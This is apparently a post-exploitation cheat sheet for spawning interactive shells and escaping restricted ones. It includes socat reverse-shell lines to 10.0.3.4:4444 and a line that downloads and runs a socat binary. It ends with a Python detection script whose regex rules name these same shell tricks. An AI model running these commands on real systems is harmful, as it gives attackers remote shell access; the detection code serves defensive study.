Python pty module:

  
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

Using socat:

On Kali (listen):

  
socat file:`tty`,raw,echo=0 tcp-listen:4444
  

On Victim (launch):

  
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
  

If socat is not installed on the victim, download a static binary and run it:

  
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444  

Other ways:

  
Using python
python -c 'import pty; pty.spawn("/bin/sh")'

Echo
echo "os.system('/bin/bash')"

sh
/bin/sh -i

bash
/bin/bash -i

Perl
perl -e 'exec "/bin/sh";'

(From within nmap)
!sh

Related Shell Escape Sequences:

Vi / Vim

  
:!bash
:set shell=/bin/bash
:shell

awk

  
awk 'BEGIN {system("/bin/bash")}' 
  

find

  
find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \; 
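
The commands above leave recognizable process command lines, so they can be matched in process-execution telemetry (auditd execve records, EDR process events). The following Python example is added here and is not from the original post; the event layout (`parent`, `cmdline`), the rule names and the `SERVICE_PARENTS` list are assumptions, and the sample events are constructed.

```python
import re
import shlex

# Assumed names of service processes that should never parent an interactive shell.
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "java", "node"}
SHELL = r"/bin/(?:ba|da|z)?sh"

# (rule name, regex over the full command line); patterns mirror the commands on this page.
RULES = [
    ("python_pty_spawn", re.compile(r"\bpython[\d.]*\b.*\bpty\.spawn\(")),
    ("socat_pty_exec", re.compile(r"\bsocat\b.*\bexec:.*\bpty\b.*\btcp:")),
    ("perl_exec_shell", re.compile(r"\bperl\b.*\bexec\s+[\"']" + SHELL)),
    ("awk_system_shell", re.compile(r"\bawk\b.*\bsystem\([\"']" + SHELL)),
]

def is_interactive_shell(argv):
    """True for `sh -i`, `bash -li` and similar: a shell binary with an -i flag."""
    if not argv or not re.fullmatch(r"(?:.*/)?(?:ba|da|z)?sh", argv[0]):
        return False
    return any(re.fullmatch(r"-[a-z]*i[a-z]*", a) for a in argv[1:])

def classify(event):
    """Return the names of rules matched by one process-execution event."""
    cmd = event["cmdline"]
    hits = [name for name, rx in RULES if rx.search(cmd)]
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        argv = cmd.split()
    if is_interactive_shell(argv) and event["parent"] in SERVICE_PARENTS:
        hits.append("interactive_shell_from_service")
    return hits

# Constructed sample events (not real telemetry).
EVENTS = [
    {"parent": "apache2", "cmdline": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    {"parent": "sh", "cmdline": "/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444"},
    {"parent": "php-fpm", "cmdline": "/bin/sh -i"},
    {"parent": "sshd", "cmdline": "/bin/bash -i"},
    {"parent": "find", "cmdline": "/usr/bin/awk 'BEGIN {system(\"/bin/bash\")}'"},
    {"parent": "cron", "cmdline": "python3 /opt/app/report.py"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["parent"], "->", classify(ev) or "clean")
```

The interactive-shell rule fires only when the parent is a service process, which keeps ordinary `bash -i` sessions under sshd out of the alerts.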
  

To learn more about bypassing Linux restricted shells, see 44592-linux-restricted-shell-bypass-guide.pdf.
